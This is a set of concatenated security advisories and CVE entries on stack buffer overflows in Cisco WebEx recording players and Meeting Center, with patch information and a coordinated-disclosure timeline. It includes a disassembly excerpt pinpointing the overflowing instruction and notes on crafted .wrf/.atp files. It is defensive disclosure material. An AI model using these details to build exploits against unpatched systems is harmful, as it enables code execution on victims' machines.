http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Multiple stack-based buffer overflows in the Cisco WebEx Recording Format (WRF) and Advanced Recording Format (ARF) Players T27LB before SP21 EP3 and T27LC before SP22 allow remote attackers to execute arbitrary code via a crafted (1) .wrf or (2) .arf file, related to use of a function pointer in a callback mechanism. Cisco WebEx is a web conferencing solution. Cisco WebEx provides record format files for storing WebEX meeting notes, and WRF Player is an application for playing back and editing WRF files (files end with a .wrf extension). This vulnerability can be triggered by publishing a .wrf video file in a conference room: .text:6070C272 loc_6070C272: ; CODE XREF: sub_6070C050+255j.text:6070C272 test esi, esi.text:6070C274 jnz short loc_6070C28F.text:6070C276 push ebx.text :6070C277 call dword ptr [ebp+0Ch] ; call to function pointer on the stack.text:6070C27A add esp, 4.text:6070C27D test al, al.text:6070C27F jz loc_6070C374.text:6070C285 mov edi, [ebp+ 0].text:6070C288 mov esi, [ebp+4].text:6070C28B mov eax, [esp+0D98h+var_D80].text:6070C28F.text:6070C28F loc_6070C28F: ; CODE XREF: sub_6070C050+224j.text:6070C28F mov Cl, [edi] ; cl can be controlled, it is read from the malicious .wrf file.text:6070C291 dec esi.text:6070C292 mov [esp+eax+0D 98h+var_C8C], cl ; this mov overflows the stack with user controlled values.text:6070C299 mov ecx, [esp+0D98h+var_D84].text:6070C29D inc edi.text:6070C29E inc eax.text:6070C29F cmp eax, ecx .text:6070C2A1 mov [esp+0D98h+var_D80], eax.text:6070C2A5 jl short loc_6070C272. Cisco WebEx is prone to multiple remote buffer-overflow vulnerabilities because it fails to perform adequate boundary-checks on user-supplied data. An attacker can exploit these issues to execute arbitrary code with the privileges of the affected application. Failed exploit attempts will result in a denial-of-service condition. The Cisco WebEx Players are applications that are used to play back WebEx meeting recordings that have been recorded on the computer of an on-line meeting attendee. The players can be automatically installed when the user accesses a recording file that is hosted on a WebEx server. The player can also be manually installed for offline playback after downloading the application from www.webex.com If the WebEx recording player was automatically installed, it will be automatically upgraded to the latest, non-vulnerable version when users access a recording file that is hosted on a WebEx server. If the WebEx recording player was manually installed, users will need to manually install a new version of the player after downloading the latest version from www.webex.com Cisco has released free software updates that address these vulnerabilities. Affected Products ================= Vulnerable Products +------------------ The vulnerabilities disclosed in this advisory affect the Cisco WebEx recording players. Microsoft Windows, Apple Mac OS X, and Linux versions of the player are all affected. Affected versions of the players are those prior to client builds T27LC SP22 and T27LB SP21 EP3. Customers who have contractual agreements that prevent WebEx from automatically upgrading a recording player to the latest version should contact their account manager to determine upgrade options. To determine whether a Cisco WebEx server is running an affected version of the WebEx client build, users can log in to their Cisco WebEx server and go to the Support > Downloads section. The version of the WebEx client build will be displayed on the right side of the page under "About Support Center." See "Software Versions and Fixes" for details. Details ======= The WebEx meeting service is a hosted multimedia conferencing solution that is managed and maintained by Cisco WebEx. The WRF and ARF file formats are used to store WebEx meeting recordings that have been recorded on the computer of an on-line meeting attendee. The recording players can be automatically installed when the user accesses a recording file that is hosted on a WebEx server (for stream playback mode). The recording players can also be manually installed after downloading the application from www.webex.com/downloadplayer.html to play back recording files locally (for offline playback mode). Multiple buffer overflow vulnerabilities exist in the WRF and ARF players. The vulnerabilities may lead to a crash of the player application or, in some cases, remote code execution could occur. To exploit one of these vulnerabilities, the player application would need to open a malicious WRF or ARF file. An attacker may be able to accomplish this exploit by providing the malicious recording file directly to users (for example, by using e-mail) or by directing a user to a malicious web page. These vulnerabilities have been assigned the following Common Vulnerabilities and Exposures (CVE) identifiers: * CVE-2010-3269 * CVE-2010-3041 * CVE-2010-3042 * CVE-2010-3043 * CVE-2010-3044 Vulnerability Scoring Details Cisco has provided scores for the vulnerabilities in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0. CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response. Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks. Cisco has provided an FAQ to answer additional questions regarding CVSS at: http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at: http://intellishield.cisco.com/security/alertmanager/cvss * Multiple Cisco WebEx Player Buffer Overflow Vulnerabilities CVSS Base Score - 9.3 Access Vector - Network Access Complexity - Medium Authentication - None Confidentiality Impact - Complete Integrity Impact - Complete Availability Impact - Complete CVSS Temporal Score - 7.7 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed Impact ====== Successful exploitation of the vulnerabilities described in this document could result in a crash of the Cisco WebEx ARF Player or WRF Player application and, in some cases, allow a remote attacker to execute arbitrary code on the system with the privileges of the user who is running the recording player application. Software Versions and Fixes =========================== When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution. These vulnerabilities are first fixed in T27LC SP22 and T27LB SP21 EP3. The client build will be determined after the software is deployed. The client build is listed in the Support > Downloads section of the WebEx page after a user authenticates. WebEx bug fixes are cumulative in a major release. For example, if release 27.22SP.0 is fixed, release 27.22SP.1 will also have the software fix. If a recording player was automatically installed, it will be automatically upgraded to the latest, nonvulnerable version when users access a recording file that is hosted on a WebEx server. If a WebEx recording player was manually installed, users will need to manually install a new version of the player after downloading the latest version from www.webex.com/downloadplayer.html Workarounds =========== There are no workarounds for the vulnerabilities disclosed in this advisory. Obtaining Fixed Software ======================== Cisco has released free software updates that address these vulnerabilities. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment. Customers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html, or as otherwise set forth at Cisco.com Downloads at http://www.cisco.com/public/sw-center/sw-usingswc.shtml Do not contact psirt@cisco.com or security-alert@cisco.com for software upgrades. Exploitation and Public Announcements ===================================== The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability described in this advisory. Cisco would like to thank these organizations for reporting these vulnerabilities. Status of this Notice: FINAL ============================ THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME. A stand-alone copy or Paraphrase of the text of this document that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors. Distribution ============ This advisory is posted on Cisco's worldwide website at : http://www.cisco.com/warp/public/707/cisco-sa-20110201-webex.shtml In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients. * cust-security-announce@cisco.com * first-bulletins@lists.first.org * bugtraq@securityfocus.com * vulnwatch@vulnwatch.org * cisco@spot.colorado.edu * cisco-nsp@puck.nether.net * full-disclosure@lists.grok.org.uk * comp.dcom.sys.cisco@newsgate.cisco.com Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates. Revision History ================ +---------------------------------------+ | Revision | | Initial | | 1.0 | 2011-Feb-01 | public | | | | release. | +---------------------------------------+ Cisco Security Procedures ========================= Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html. This includes instructions for press inquiries regarding Cisco security notices. +-------------------------------------------------------------------- Copyright 2010-2011 Cisco Systems, Inc. All rights reserved. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Core Security Technologies - Corelabs Advisory http://corelabs.coresecurity.com/ Cisco WebEx .atp and .wrf Overflow Vulnerabilities 1. *Advisory Information* Title: Cisco WebEx .atp and .wrf Overflow Vulnerabilities Advisory ID: CORE-2010-1001 Advisory URL: [http://www.coresecurity.com/content/webex-atp-and-wrf-overflow-vulnerabilities] Date published: 2011-01-31 Date of last update: 2011-01-31 Vendors contacted: Cisco Release mode: Coordinated release 2. *Vulnerability Information* Class: Stack-based Buffer Overflow [CWE-121], Stack-based Buffer Overflow [CWE-121] Impact: Code execution Remotely Exploitable: Yes (client-side) Locally Exploitable: No CVE Name: CVE-2010-3269, CVE-2010-3270 Bugtraq ID: N/A 3. *Vulnerability Description* There are stack overflows on WebEx [1] that can be exploited by sending maliciously crafted .atp and .wrf files to a vulnerable WebEx user. When opened, these files trigger a reliably exploitable stack based buffer overflow. In the .atp case an exception handler can be overwritten on the stack, and most registers can be trivially overwritten. 4. *Vulnerable packages* . Contact Cisco for a list of vulnerable versions. 5. *Non-vulnerable packages* . Contact Cisco. 6. *Vendor Information, Solutions and Workarounds* All clients of WebEx Meeting Center should now be running a patched version according to Cisco. A non-vulnerable version of WebEx Player should be available at [http://www.webex.com/downloadplayer.html]. 7. *Credits* These vulnerabilities were discovered and researched by Federico Muttis, Sebastian Tello and Manuel Muradas from Core Security Technologies during Bugweek 2010 as part of the "Cisco Baby Cisco!" team [2]. The publication of this advisory was coordinated by Pedro Varangot. 8. *Technical Description* 8.1. *WebEx Player .wrf Buffer Overflow [CVE-2010-3269]* WebEx Player can be used to playback recordings of WebEx sessions. These recordings can be stored using the .wrf closed and undocumented file format. This vulnerability can also be exploited by publishing a .wrf video file in a meeting, resulting in the compromise of the meeting's participants. *WebEx Meeting Center .atp Buffer Overflow [CVE-2010-3270]* WebEx Meeting Center allows polls to be conducted between all participants of a WebEx session. By serving a specially crafted .atp file (used for conducting polls) the meeting host can then abruptly disconnect from the server, and when another client becomes host and tries to share the .atp file with the other clients arbitrary code execution is possible on his workstation. If his connection to the server is then severed by a malicious payload, the .atp file will be cycled to the next connected client. We developed trivial examples that take control of EIP using arbitrary characters. 9. *Report Timeline* . 2010-10-04: Core Security Technologies contacts Cisco PSIRT using their provided PGP key notifying them of the vulnerabilities and sending an advisory draft, a proof of concept for the WebEx Player vulnerability, and a proof of concept for the Meeting Center vulnerability including details of how to reproduce both vulnerabilities, and details about the behaviour of the PoC for the Player vulnerability on Windows XP SP2 (which overwrites EIP with 0x41414141 on that platform). October 18th 2010 (a two weeks timeframe) is set as a potential release date for the advisory. 2010-10-05: Cisco PSIRT contacts Core stating that their development team is out of the office till Friday October 8th. November 15th 2010 is mentioned as an estimated release date for a fix. 2010-10-05: Core replies to Cisco PSIRT postponing the release date of this advisory for one week, to Monday October 25th, in order to contemplate the fact that Cisco's development team is away from office for the week. Further changes to the release date will be made after receiving technical feedback. November the 15th is mentioned to be a possible date to settle on. 2010-10-11: Cisco PSIRT replies acknowledging "an exception in WebEx player" but that doesn't overwrite EIP as Core Security Technologies indicated. Cisco notifies that they were not able to reproduce the crash in WebEx Meeting Center. Cisco PSIRT also asks for more detailed information about the version of WebEx Player used. 2010-10-12: Core sends the requested information, also attaching new proof of concept exploits for the WebEx Player vulnerability (that now executes code and launches "calc.exe"), and further details about the steps needed to reproduce the WebEx Meeting Center crash. Details about the system where the proof of concept for the WebEx Player vulnerability was run are asked. Details about the "exception" are also asked, specially noting that if other registers are overwritten this should be considered as a vulnerability that would possibly lead to reliable code execution even if EIP was not modified (as noted by Core on the e-mail where the PoC was attached). No reply is received to this e-mail. 2010-10-19: Core resends the previous e-mail asking for news about reproduction of the vulnerability on Cisco's side and asking if there was any problem in the reception or interpretation of the last communication. No reply is received to this e-mail. 2010-10-28: Core Security Technologies resends the last e-mail, unilaterally rescheduling the publication of this advisory to November 8th 2010, which is closer to Cisco's initial estimation for the release of a fix. Core states its willingness to reschedule this publication date but only under firm commitment from Cisco to working seriously towards fixing this issue in a scheduled timeframe. An updated advisory draft is attached which includes an updated timeline. 2010-10-30: Cisco PSIRT replies acknowledging the vulnerability, stating that they were able to reproduce code execution results in the currently released version of WebEx, and a crash in their current development version. Cisco also states that there is not information yet from their development team about when a fix for this vulnerability will be released. 2010-11-09: Core replies offering more technical details about exploitation if they are needed, and reminding Cisco that the crash in their development version may also be exploitable even if the current proof of concept exploit only crashes it. The publication date for this advisory is rescheduled to November 22nd 2010. Core states that they will like to schedule a firm date for the release of information about this vulnerability to the public and hence would like to get more information from Cisco about the schedule for the release of a fix. 2010-11-15: Cisco states that fixed code will be deployed in mid-December, but since WebEx Meeting Center runs on a SaaS environment it takes about four or five weeks for all clients to be running the latest version of the code. 2010-12-06: Cisco contacts Core since no reply was received in the past two weeks, and clarifies that a fix will be deployed on December 15th and should be done on January 11th 2011. 2010-12-06: Core states that they believe this advisory should be released as soon as the fix is deployed, since diffing the WebEx binary on the client side gives full details about the WebEx Meeting Center vulnerability to an average skilled reverse engineer. Core schedules the publication of this advisory to December 15th 2010. 2010-12-07: Cisco contacts Core stating that releasing details about this vulnerability would endanger customers, since there is no action they can take to protect themselves because the responsibility of upgrading the code ran by the customer falls on Cisco. Cisco mentions that "many of these customers are probably shared between Cisco and Core Security". 2010-12-10: Cisco contacts Core stating that they have just discovered the WebEx Meeting Center Vulnerability affects a new set of customers that where not accounted for originally. These are customers running T27SP21 that can not be upgraded to SP22. An emergency patch will be released for SP21 in January 2011, and this sets back the date when all clients should be running an updated version to the "end of January, beginning of February." . 2010-12-14: Core proposes to split this advisory into two different advisories to better accommodate the WebEx Meeting Center SaaS release cycle. On one advisory, the .wrf client side vulnerability would be described, and the other would be dedicated to the WebEx Meeting Center vulnerability that may compromise a meeting's host computer. Core believes this mitigates the risk in a more effective way, since clients can update WebEx Player by themselves on December 15th (the date when Cisco stated the fixed version would be released) and no details of the Meeting Center vulnerability would be released until all clients are running an updated version. 2010-12-15: Cisco states they wouldn't like the advisory to be splitted, and that they prefer Core Security Technologies to go ahead and release information about both vulnerabilities. 2010-12-15: Core states that they prefer to release two advisories because these are two different bugs, in two pieces of software, each one of them with a differently working update channel determined by the vendor. Core also informs Cisco that the download link for WebEx Player points to a vulnerable version as of today, and asks Cisco to clarify what date they meant as mid-December, since Core would like to know when a fixed version of WebEx Player will be available for download to be able to publish the WebEx Player vulnerability. 2010-12-16: Cisco replies saying that releasing two advisories seems like a good plan to them. Cisco also states that since many of their customers observe a lockdown policy during the holidays season, they take a "don't upgrade" policy of their own until Monday January 10th, 2011. That is the reason why the download link of WebEx Player has not been changed yet. 2011-01-10: Core states that they are ready to release this advisory on January 11th, and that releasing two separate advisories seems pointless now because the release date of both would be very similar, and the original idea was to mitigate the risk posed by the .wrf vulnerability. Core also states that they are reviewing the best course of action to take with the issue regarding clients running the old version of WebEx (T27SP21) that according to Cisco are unable to upgrade to SP22 since this was not accounted for previously. 2011-01-13: Core states that since they have committed previously to release the advisory taking into account Cisco's consideration about their SaaS patch deploy model, when factoring the issue of clients running the SP21 version of Meeting Center scheduled by Cisco for emergency update on January, a release date of January the 31st seems reasonable. This date should be taken as final and Core Security Technologies believes it takes into account all information given by Cisco about SaaS updating timeframes. If this is not the case Cisco is asked to rectify ASAP. 2011-01-14: Cisco confirms that the timeframe (publishing both vulnerabilities on January 31st) works for them. 2011-01-31: The advisory CORE-2010-1001 is published. 10. *References* [1] [http://www.webex.com/] [2] [http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=project&name=Bugweek] 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: [http://corelabs.coresecurity.com]. 12. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at [http://www.coresecurity.com]. 13. *Disclaimer* The contents of this advisory are copyright (c) 2011 Core Security Technologies and (c) 2011 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: [http://creativecommons.org/licenses/by-nc-sa/3.0/us/] 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at [http://www.coresecurity.com/files/attachments/core_security_advisories.asc]. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (MingW32) iEYEARECAAYFAk1HJwcACgkQyNibggitWa13VwCfVg6jVkuv3PhqmhNqZFIQO7CB L1YAni1ONdRqEYczbkvki9r0Y7nr9cIQ =9HdA -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/

Multiple buffer overflows in the Cisco WebEx Recording Format (WRF) and Advanced Recording Format (ARF) Players T27LB before SP21 EP3 and T27LC before SP22 allow remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted (1) .wrf or (2) .arf file, related to atas32.dll, a different vulnerability than CVE-2010-3042, CVE-2010-3043, and CVE-2010-3044. Cisco WebEx is prone to multiple remote buffer-overflow vulnerabilities because it fails to perform adequate boundary-checks on user-supplied data. Failed exploit attempts will result in a denial-of-service condition. The Cisco WebEx Players are applications that are used to play back WebEx meeting recordings that have been recorded on the computer of an on-line meeting attendee. The players can be automatically installed when the user accesses a recording file that is hosted on a WebEx server. The player can also be manually installed for offline playback after downloading the application from www.webex.com If the WebEx recording player was automatically installed, it will be automatically upgraded to the latest, non-vulnerable version when users access a recording file that is hosted on a WebEx server. If the WebEx recording player was manually installed, users will need to manually install a new version of the player after downloading the latest version from www.webex.com Cisco has released free software updates that address these vulnerabilities. This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20110201-webex.shtml. Affected Products ================= Vulnerable Products +------------------ The vulnerabilities disclosed in this advisory affect the Cisco WebEx recording players. Microsoft Windows, Apple Mac OS X, and Linux versions of the player are all affected. Affected versions of the players are those prior to client builds T27LC SP22 and T27LB SP21 EP3. Customers who have contractual agreements that prevent WebEx from automatically upgrading a recording player to the latest version should contact their account manager to determine upgrade options. To determine whether a Cisco WebEx server is running an affected version of the WebEx client build, users can log in to their Cisco WebEx server and go to the Support > Downloads section. The version of the WebEx client build will be displayed on the right side of the page under "About Support Center." See "Software Versions and Fixes" for details. Cisco recommends that users upgrade to the most current version of the player that is available from www.webex.com/downloadplayer.html Products Confirmed Not Vulnerable +-------------------------------- No other Cisco products are currently known to be affected by these vulnerabilities. Details ======= The WebEx meeting service is a hosted multimedia conferencing solution that is managed and maintained by Cisco WebEx. The WRF and ARF file formats are used to store WebEx meeting recordings that have been recorded on the computer of an on-line meeting attendee. The players are applications that are used to play back and edit recording files (files with .wrf and .arf extensions). The recording players can be automatically installed when the user accesses a recording file that is hosted on a WebEx server (for stream playback mode). The recording players can also be manually installed after downloading the application from www.webex.com/downloadplayer.html to play back recording files locally (for offline playback mode). Multiple buffer overflow vulnerabilities exist in the WRF and ARF players. The vulnerabilities may lead to a crash of the player application or, in some cases, remote code execution could occur. To exploit one of these vulnerabilities, the player application would need to open a malicious WRF or ARF file. An attacker may be able to accomplish this exploit by providing the malicious recording file directly to users (for example, by using e-mail) or by directing a user to a malicious web page. The vulnerability cannot be triggered by users who are attending a WebEx meeting. These vulnerabilities have been assigned the following Common Vulnerabilities and Exposures (CVE) identifiers: * CVE-2010-3269 * CVE-2010-3041 * CVE-2010-3042 * CVE-2010-3043 * CVE-2010-3044 Vulnerability Scoring Details Cisco has provided scores for the vulnerabilities in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0. CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response. Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks. Cisco has provided an FAQ to answer additional questions regarding CVSS at: http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at: http://intellishield.cisco.com/security/alertmanager/cvss * Multiple Cisco WebEx Player Buffer Overflow Vulnerabilities CVSS Base Score - 9.3 Access Vector - Network Access Complexity - Medium Authentication - None Confidentiality Impact - Complete Integrity Impact - Complete Availability Impact - Complete CVSS Temporal Score - 7.7 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed Impact ====== Successful exploitation of the vulnerabilities described in this document could result in a crash of the Cisco WebEx ARF Player or WRF Player application and, in some cases, allow a remote attacker to execute arbitrary code on the system with the privileges of the user who is running the recording player application. Software Versions and Fixes =========================== When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution. These vulnerabilities are first fixed in T27LC SP22 and T27LB SP21 EP3. For customers who are running T27LC SP22, the client build will be represented as 27.22SP.0.9253. The fix for customers who are running T27LB SP21 will be deployed by WebEx over the next few weeks. The client build will be determined after the software is deployed. The client build is listed in the Support > Downloads section of the WebEx page after a user authenticates. WebEx bug fixes are cumulative in a major release. For example, if release 27.22SP.0 is fixed, release 27.22SP.1 will also have the software fix. If a recording player was automatically installed, it will be automatically upgraded to the latest, nonvulnerable version when users access a recording file that is hosted on a WebEx server. If a WebEx recording player was manually installed, users will need to manually install a new version of the player after downloading the latest version from www.webex.com/downloadplayer.html Workarounds =========== There are no workarounds for the vulnerabilities disclosed in this advisory. Obtaining Fixed Software ======================== Cisco has released free software updates that address these vulnerabilities. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment. Customers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html, or as otherwise set forth at Cisco.com Downloads at http://www.cisco.com/public/sw-center/sw-usingswc.shtml Do not contact psirt@cisco.com or security-alert@cisco.com for software upgrades. Exploitation and Public Announcements ===================================== The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability described in this advisory. These vulnerabilities were either found during internal testing or reported to Cisco by a variety of sources, including Core Security, TippingPoint, and Fortinet's FortiGuard Labs. Cisco would like to thank these organizations for reporting these vulnerabilities. Status of this Notice: FINAL ============================ THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME. A stand-alone copy or Paraphrase of the text of this document that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors. Distribution ============ This advisory is posted on Cisco's worldwide website at : http://www.cisco.com/warp/public/707/cisco-sa-20110201-webex.shtml In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients. * cust-security-announce@cisco.com * first-bulletins@lists.first.org * bugtraq@securityfocus.com * vulnwatch@vulnwatch.org * cisco@spot.colorado.edu * cisco-nsp@puck.nether.net * full-disclosure@lists.grok.org.uk * comp.dcom.sys.cisco@newsgate.cisco.com Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates. Revision History ================ +---------------------------------------+ | Revision | | Initial | | 1.0 | 2011-Feb-01 | public | | | | release. | +---------------------------------------+ Cisco Security Procedures ========================= Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html. This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at http://www.cisco.com/go/psirt. +-------------------------------------------------------------------- Copyright 2010-2011 Cisco Systems, Inc. All rights reserved. +-------------------------------------------------------------------- -----BEGIN PGP SIGNATURE----- Version: GnuPG/MacGPG2 v2.0.14 (Darwin) iF4EAREIAAYFAk1IQjoACgkQQXnnBKKRMNCpdQEAg/vWtP38VKH2ZDeL9QMQfx6E M8nIZdeL2XGonJpT60IA/0APzTbZPE+9rWTi1Z0lJqIgCjHls3jo+sGQWSPvxxkS =Ur/Y -----END PGP SIGNATURE-----

Multiple buffer overflows in the Cisco WebEx Recording Format (WRF) and Advanced Recording Format (ARF) Players T27LB before SP21 EP3 and T27LC before SP22 allow remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted (1) .wrf or (2) .arf file, related to atas32.dll, a different vulnerability than CVE-2010-3041, CVE-2010-3042, and CVE-2010-3043. Cisco WebEx is prone to multiple remote buffer-overflow vulnerabilities because it fails to perform adequate boundary-checks on user-supplied data. Failed exploit attempts will result in a denial-of-service condition. The Cisco WebEx Players are applications that are used to play back WebEx meeting recordings that have been recorded on the computer of an on-line meeting attendee. The players can be automatically installed when the user accesses a recording file that is hosted on a WebEx server. The player can also be manually installed for offline playback after downloading the application from www.webex.com If the WebEx recording player was automatically installed, it will be automatically upgraded to the latest, non-vulnerable version when users access a recording file that is hosted on a WebEx server. If the WebEx recording player was manually installed, users will need to manually install a new version of the player after downloading the latest version from www.webex.com Cisco has released free software updates that address these vulnerabilities. This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20110201-webex.shtml. Affected Products ================= Vulnerable Products +------------------ The vulnerabilities disclosed in this advisory affect the Cisco WebEx recording players. Microsoft Windows, Apple Mac OS X, and Linux versions of the player are all affected. Affected versions of the players are those prior to client builds T27LC SP22 and T27LB SP21 EP3. Customers who have contractual agreements that prevent WebEx from automatically upgrading a recording player to the latest version should contact their account manager to determine upgrade options. To determine whether a Cisco WebEx server is running an affected version of the WebEx client build, users can log in to their Cisco WebEx server and go to the Support > Downloads section. The version of the WebEx client build will be displayed on the right side of the page under "About Support Center." See "Software Versions and Fixes" for details. Cisco recommends that users upgrade to the most current version of the player that is available from www.webex.com/downloadplayer.html Products Confirmed Not Vulnerable +-------------------------------- No other Cisco products are currently known to be affected by these vulnerabilities. Details ======= The WebEx meeting service is a hosted multimedia conferencing solution that is managed and maintained by Cisco WebEx. The WRF and ARF file formats are used to store WebEx meeting recordings that have been recorded on the computer of an on-line meeting attendee. The players are applications that are used to play back and edit recording files (files with .wrf and .arf extensions). The recording players can be automatically installed when the user accesses a recording file that is hosted on a WebEx server (for stream playback mode). The recording players can also be manually installed after downloading the application from www.webex.com/downloadplayer.html to play back recording files locally (for offline playback mode). Multiple buffer overflow vulnerabilities exist in the WRF and ARF players. The vulnerabilities may lead to a crash of the player application or, in some cases, remote code execution could occur. To exploit one of these vulnerabilities, the player application would need to open a malicious WRF or ARF file. An attacker may be able to accomplish this exploit by providing the malicious recording file directly to users (for example, by using e-mail) or by directing a user to a malicious web page. The vulnerability cannot be triggered by users who are attending a WebEx meeting. These vulnerabilities have been assigned the following Common Vulnerabilities and Exposures (CVE) identifiers: * CVE-2010-3269 * CVE-2010-3041 * CVE-2010-3042 * CVE-2010-3043 * CVE-2010-3044 Vulnerability Scoring Details Cisco has provided scores for the vulnerabilities in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0. CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response. Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks. Cisco has provided an FAQ to answer additional questions regarding CVSS at: http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at: http://intellishield.cisco.com/security/alertmanager/cvss * Multiple Cisco WebEx Player Buffer Overflow Vulnerabilities CVSS Base Score - 9.3 Access Vector - Network Access Complexity - Medium Authentication - None Confidentiality Impact - Complete Integrity Impact - Complete Availability Impact - Complete CVSS Temporal Score - 7.7 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed Impact ====== Successful exploitation of the vulnerabilities described in this document could result in a crash of the Cisco WebEx ARF Player or WRF Player application and, in some cases, allow a remote attacker to execute arbitrary code on the system with the privileges of the user who is running the recording player application. Software Versions and Fixes =========================== When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution. These vulnerabilities are first fixed in T27LC SP22 and T27LB SP21 EP3. For customers who are running T27LC SP22, the client build will be represented as 27.22SP.0.9253. The fix for customers who are running T27LB SP21 will be deployed by WebEx over the next few weeks. The client build will be determined after the software is deployed. The client build is listed in the Support > Downloads section of the WebEx page after a user authenticates. WebEx bug fixes are cumulative in a major release. For example, if release 27.22SP.0 is fixed, release 27.22SP.1 will also have the software fix. If a recording player was automatically installed, it will be automatically upgraded to the latest, nonvulnerable version when users access a recording file that is hosted on a WebEx server. If a WebEx recording player was manually installed, users will need to manually install a new version of the player after downloading the latest version from www.webex.com/downloadplayer.html Workarounds =========== There are no workarounds for the vulnerabilities disclosed in this advisory. Obtaining Fixed Software ======================== Cisco has released free software updates that address these vulnerabilities. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment. Customers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, 